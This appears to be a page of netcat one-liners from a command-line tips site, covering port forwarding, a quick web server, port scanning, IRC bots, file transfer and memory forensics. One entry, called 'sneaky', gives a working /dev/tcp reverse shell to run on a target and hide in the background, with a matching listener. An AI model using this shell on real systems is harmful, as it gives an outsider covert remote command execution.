Redirect the local port 2000 to the remote port 3000. The same but UDP:
nc -u -l -p 2000 -c "nc -u 3000"
It may be used to "convert" TCP client to UDP server (or viceversa):
nc -l -p 2000 -c "nc -u 3000"
Very simple web server listening on port 80 will serve index.html file or whatever file you like pointing your browser at http://your-IP-address/index.html for example. If your web server is down for maintenance and you'd like to inform your visitors about it, quickly and easily, you just have to put into the index.html file the right HTML code and you are done! Of course you need to be root to run the command using port 80.
Command makes use of the Malware Hash Registry ( It parses the current directory and subdirectories and calculates the md5 hash of the files, then prints the name and sends the hash to the MHR for a lookup in their database. The 3rd value in the result is the detection percentage across a mix of AV packages. Show Sample Output
Simple one-liner for scanning a range of hosts, you can also scan a range of ports with Netcat by ex.: nc -v -n -z -w 1 21-443 Useful when Nmap is not available:) Range declaration like X..X "for i in {21..29}" is only works with bash 3.0+ Show Sample Output
This is sneaky.
First, start a listening service on your box.
nc -l 8080 -vvv &
On the target you will create a new descriptor which is assigned to a network node. Then you will read and write to that descriptor.
exec 5<>/dev/tcp/<your_box>/8080;cat <&5 | while read line; do $line 2>&5 >&5; done
You can send it to the background like this:
(exec 5<>/dev/tcp/<your-box>/8080;cat <&5 | while read line; do $line 2>&5 >&5;) &
Now everything you type in our local listening server will get executed on the target and the output of the commands will be piped back to the client.
Show Sample Output
Uses the extremely cool utilities netcat and expect. "expect" logs in & monitors for server PING checks. When a PING is received it sends the PONG needed to stay connected. IRC commands to try: HELP, TIME, MOTD, JOIN and PRIVMSG The "/" in front of IRC commands are not needed, e.g. type JOIN #mygroup Learn about expect: The sample output shows snippets from an actual IRC session. Please click UP button if you like it! Show Sample Output
To connect to the shell run:
nc 2000
@putnamhill, no need if statement in that case. && is a AND and || is a OR
Try to perform a fully TCP 3 way handshake on for a given host-port with a timeout of 1s. Show Sample Output
for udp nmap -sU -p 80 hostname
Requires netcat.
command | my_irc
Pipe whatever you want to this function, it will, if everything goes well, be redirected to a channel or a user on an IRC server.
Please note that :
- I am not responsible of flood excesses you might provoke.
- that function does not reply to PINGs from the server. That's the reason why I first write in a temporary file. Indeed, I don't want to wait for inputs while being connected to the server. However, according to the configuration of the server and the length of your file, you may timeout before finishing.
- Concerning the server, the variable content must be on the form " 6667" (or any other port). If you want to make some tests, you can also create a fake IRC server on "localhost 55555" by using
netcat -l -p 55555
- Concerning the target, you can choose a channel (beginning with a '#' like "#chan") or a user (like "user")
- The other variables have obvious names.
Show Sample Output
sends commands specified in $commandfile to the telnet-server specified by $telnetserver.
to have newlines in $commandfile interpreted as ENTER, save the file in CR+LF (aka "Windows-Textfile") format.
if you want to save the output in a separate file, use:
nc $telnetserver 23 < $commandfile > $resultfile
USAGE: gate listening_port host port Creates listening socket and connects to remote device at host:port. It uses pipes for connection between two sockets. Traffic which goes through pipes is wrote to stdout. I use it for debug network scripts.
On the another machine write this command. pv -r /dev/zero | nc 7777 It will show live throughput between two machine.The destination machine ip is at our example You must multiply by 8 for the network calculation. You must install pv and netcat commands for this commands usage. Show Sample Output
Use it to send raw data to a networked device. Used to interact with relay controller board whose documentation is lost, so use wireshark to sniff the sent data and replayed using the command.
`while true`: do forever `nc -l -p 4300 -c 'echo hello'`: this is the but anything can go here really `test $? -gt 0 && break`: this checks the return code for ctrl^c or the like and quite the loop, otherwise in order to kill the loop you'd have to get the parent process id and kill it. Show Sample Output
Tar's up $DIR locally (w/bzip2) and sends remotely to $HOST:$PORT where netcat listens (using openbsd netcat). Start up receiving side command first, then execute this.
Receives bzip'd tar archive via netcat (openbsd nc) and stores locally. Displays size with pv. Start this receiver first, then the sender.
wmr - | pv -s $SIZEOFMEM | ssh -p 40004 -c arcfour,blowfish-cbc -C "cat - > /forensics/T430-8gb-RAM1.dd" Run above command from Windows Cygwin: On Windows: Install Cygwin, and copy WMR (windows memory reader 1.0) memory diagnostic into cygwin\bin folder, also install cygwins netcat and ssh (openssh). I recommend installing apt-cyg and running " On Linux: Have an SSH Server SIMPLEST FORM: WINDOWS: # wmr - | ssh "cat - > /tmp/FileToSave.dd" For more details on how to extract information from memory dump: apt-get install foremost foremost -t all -T -i /forensics/T430-8gb-RAM1.dd For more information: Show Sample Output
A TCP server that keeps the same socket open, sending the contents of "file" repeatedly.
If you want to see your top ten cpu using processes from the browser (e.g. you don't want to ssh into your server all the time for checking system load) you can run this command and browse to the machines ip on port 8888. For example Show Sample Output is the place to record those command-line gems that you return to again and again. That way others can gain from your CLI wisdom and you from theirs too. All commands can be commented on, discussed and voted up or down.
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